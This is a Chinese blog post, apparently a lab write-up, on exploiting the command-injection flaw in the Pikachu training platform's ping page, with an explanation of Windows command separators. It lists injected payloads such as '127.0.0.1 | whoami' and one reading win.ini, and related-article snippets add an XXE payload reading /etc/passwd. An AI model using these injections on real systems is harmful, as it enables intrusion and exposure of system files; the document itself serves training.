pikachu--命令执行

最新推荐文章于 2023-12-30 17:36:45 发布
最新推荐文章于 2023-12-30 17:36:45 发布
阅读量235 收藏 1
点赞数
分类专栏: pikachu 文章标签: 数学建模
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/firecjh/article/details/131131872
版权

任务一:命令执行

实验环境:

本地搭建pikachu

进入pikachu平台。进入RCE模块。点击exec“ping”。

步骤:

  1. 分析源码。分析为什么会造成命令执行漏洞。

首先将$ _POST[ipaddress]赋值给$ip,然后直接未经任何处理就将其传入shell_exec()函数执行,造成命令可拼接执行。

  1. 漏洞利用

a) 127.0.0.1 | whoami

b) 127.0.0.1 | ipconfig

c)  127.0.0.1 | netstat

d) 127.0.0.1 | type C:\Windows\win.ini

任务二:

简答题:windows四种命令连接符(&&&|||)的用法?

a && b :代表首先执行前者命令a再执行后命令b,但是前提条件是命令a执行正确才会执行命令b,在a执行失败的情况下不会执行b命令。所以又被称为短路运算符。

(前面的命令执行成功后,它后面的命令才被执行)

a & b:代表首先执行命令a再执行命令b,如果a执行失败,还是会继续执行命令b。也就是说命令b的执行不会受到命令a的干扰。

(表示简单的拼接,A命令语句和B命令语句没有制约关系)

a || b:代表首先执行a命令再执行b命令,如果a命令执行成功,就不会执行b命令,相反,如果a命令执行不成功,就会执行b命令。

(前面的命令执行失败,它后面的命令才被执行)

a | b:代表首先执行a命令,再执行b命令,不管a命令成功与否,都会去执行b命令。

(当第一条命令失败时,它仍然会执行第二条命令,表示A命令语句的输出,作为B命令语句的输入执行。)

像雾若雨又如风
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pikachu-master
05-04
pikachu漏洞测试平台搭建
Pikachu之RCE实验
莫黎小天
05-26 507
一、exec“ping” 在输入框输入8.8.8.8,发现可以ping通 1.ip+|+命令 1)在输入127.0.0.1 | whoami命令执行如下:得到设备名称以及用户名称 2)输入127.0.0.1 |systeminifo,可以爆出更多的关于主机的信息 2.ip+&+命令(与上面类似) 127.0.0.1 & whoami既可以输出是否ping通也可以显示设备名称及用户名称 二、exec“evel”实验 查看源代码 需要获得一个不报错的值,才能执行html 拿最简单的p
pikachu-xss.txt
06-10
pikachu-xss
Pikachu靶场全级别通关教程详解
Innocence_0的博客
07-11 1687
Cross-site request forgrey简称为"CSRF"。在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接)然后欺骗目标用户进行点击,用户一旦点击这个请求,整个攻击也就完成了。因此CSRF攻击也被称为"one click"攻击。为什么小黑可以攻击成功呢?条件1:xxx购物网站没有对个人信息修改的请求进行防CSRF处理,导致该请求容易被伪造。因此,我们判断一个网站是否存在CSRF漏洞,其实就是判断其对关键信息(比如密码等敏感信息)的操作(增删改)是否容易被伪造。
pikachu-RCE
qq_43660551的博客
05-15 297
远程命令执行:应用系统从设计上需要给用户提供指定的远程命令操作的接口比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。例 echo whoami。&(后台任务符):两条语句都执行,如果前面的语句为假则执行后面的语句,如果前面的语句为真则不执行后面的语句。&:两条语句都执行,如果前面的语句为假则执行后面的语句,如果前面的语句为真则不执行后面的语句。
pikachu--代码执行
firecjh的博客
06-10 183
即把用户的输入作为代码的一部分进行执行,造成了远程代码执行漏洞。进入pikachu平台。点击exec“eval”。分析为什么会造成代码执行漏洞。a) 执行phpinfo();直接把输入的内容放在。
Pikachu3_RCE(远程命令/代码执行)
weixin_44193247的博客
03-15 1524
Pikachu漏洞复现练习篇
Pikachu-----RCE(远程命令/代码执行
m0_65712192的博客
12-29 885
Pikachu-----RCE
pikachu靶场之RCE漏洞“ping”
最新发布
m0_54146694的博客
12-30 598
4)“&&” -----A && B 运行命令A,如果成功则运行命令B(简言之,就是A的状态决定了B是否执行,A为真,则A与B都执行;1)“|”-----管道符,前面命令标准输出,后面命令的标准输入。例如:A | B,不管命令A是否为正确命令,都只会执行命令B(只执行后面的),如。2)“&” -----A & B 无论真假,先运行命令A,然后运行命令B(强调执行顺序的先后),如。3)“||” -----A || B 只有A为假时才执行B,否则只执行A(A和B只执行一个)(意在节省资源消耗)!
pikachu-master.zip
06-25
Pikachu,这是一个综合类型的靶场练习环境,覆盖了较为全面的漏洞练习,在掌握漏洞原理后,可以通过该靶场来进一步强化自己的知识技能。
pikachu——RCE exec “ping“python脚本解法(一)
记录并分享学习安全的知识点..
01-24 481
输入127.0.0.1命令,查看pikachu的exec "ping"页面的源代码,如下图所示: 通过查询得知pre是唯一的,因此需要将返回页面中的pre标签提取出来,最为方便的是使用BeautifulSoup模块,这个模块的主要功能是解析并提取网页中的数据。 python爬虫——Beautiful Soup库(数据解析)详细说明_xiaofengdada的博客-CSDN博客 python爬虫——request模块(一)_xiaofengdada的博客-CSDN博客_python reques..
pikachu RCE--远程命令执行 & 远程代码执行
weixin_44769042的博客
09-12 407
直接干 目录 exec "ping" exec "eval" exec "ping" 介绍: 应用程序有时需要调用一些执行命令的函数,如在PHP里,使用system,exec,shell_exec,passthru,popen,proc_popen等函数可以执行系统命令。当黑客可以控制这些函数中的参数时,就可以将恶意的系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。 观察ttl,可大致判断目标为 windows系统 利用管道符 | ,让系统执行命令 127.0.0.
pikachu通关教程~~~~
m0_57349349的博客
08-03 3071
暴力破解 基于表单的暴力破解 1.拦截包发送到intruder 设置playload 判断长度得到账号密码 登录成功 2.验证码绕过(on sever) 输入正确验证码之后 在BURP上发送给intruder配置payload 得到密码 3.基于client端的验证码绕过(on client) 输入正确验证码 用burp拦截 放包 得到响应报文 编辑 把false改成true 得到的新的响应报文再放包 现在随便输入账号密...
pikachu——RCE exec “ping“python脚本解法(二)和(三)
记录并分享学习安全的知识点..
01-24 741
输入127.0.0.1命令,查看pikachu的exec "ping"页面的源代码,如下图所示: 通过查询得知pre是唯一的,因此需要将返回页面中的pre标签提取出来,本篇主要讲解在解法一的基础上使用re模块正则网页内容,爬取网页数据,达到通过目的。 python爬虫——request模块(一)_xiaofengdada的博客-CSDN博客_python request python——正则表达式(一)_xiaofengdada的博客-CSDN博客python——re模块9个常量举例详细讲解_xi
java 远程执行linux命令_Pikachu-RCE远程命令执行漏洞
weixin_39597323的博客
11-19 327
RCE:远程代码、命令执行漏洞给攻击者向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。远程系统命令执行一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 如...
Pikachu靶场——远程命令执行漏洞(RCE)
来日可期的博客
10-05 1627
远程命令执行(Remote Code Execution,RCE)是一种安全漏洞,攻击者可以通过该漏洞在远程服务器上执行恶意代码或命令。RCE 漏洞通常出现在应用程序或操作系统中,由于不正确的输入验证或处理而导致。一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上,一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 如果设计者在
Pikachu靶场之SQL注入、远程代码执行、文件包含漏洞
Jach1n
02-01 598
Pikachu靶场之SQL注入、远程代码执行、文件包含漏洞
pikachu靶场平台利用XXE漏洞调用except伪协议调用系统命令执行系统命令
05-23
首先需要了解什么是XXE漏洞,它是指攻击者可以通过向Web应用程序发送恶意XML文件来触发应用程序内部的XML解析器,并导致攻击者能够读取任意文件、执行任意命令等攻击。 接下来,我们需要利用XXE漏洞调用except伪协议来执行系统命令。except伪协议是一种在XML文档中嵌入任意数据的方法,它的语法如下: ``` <!ENTITY name SYSTEM "file:///path/to/file"> ``` 其中name为实体名称,可以在XML文档中通过&name;来引用,file:///path/to/file为要读取的文件路径。 我们可以利用这个语法来执行系统命令,具体步骤如下: 1. 构造包含XXE漏洞的XML文件,例如: ``` <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <foo>&xxe;</foo> ``` 这个XML文件包含一个名为xxe的实体,它的值为file:///etc/passwd,表示要读取/etc/passwd文件。 2. 将XML文件发送到目标应用程序,并触发XXE漏洞。如果漏洞存在,则应用程序会解析XML文件,并读取xxe实体的值。 3. 修改实体的值,将它改为要执行的系统命令。例如: ``` <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "except://`ls /`"> ]> <foo>&xxe;</foo> ``` 这个XML文件将xxe实体的值改为了except://`ls /`,表示要执行ls /命令。 4. 再次发送XML文件到目标应用程序,触发XXE漏洞,并执行系统命令。 需要注意的是,如果目标系统禁止了except伪协议,则无法利用这种方法执行系统命令。此外,执行系统命令可能会产生安全风险,建议仅在测试环境中使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值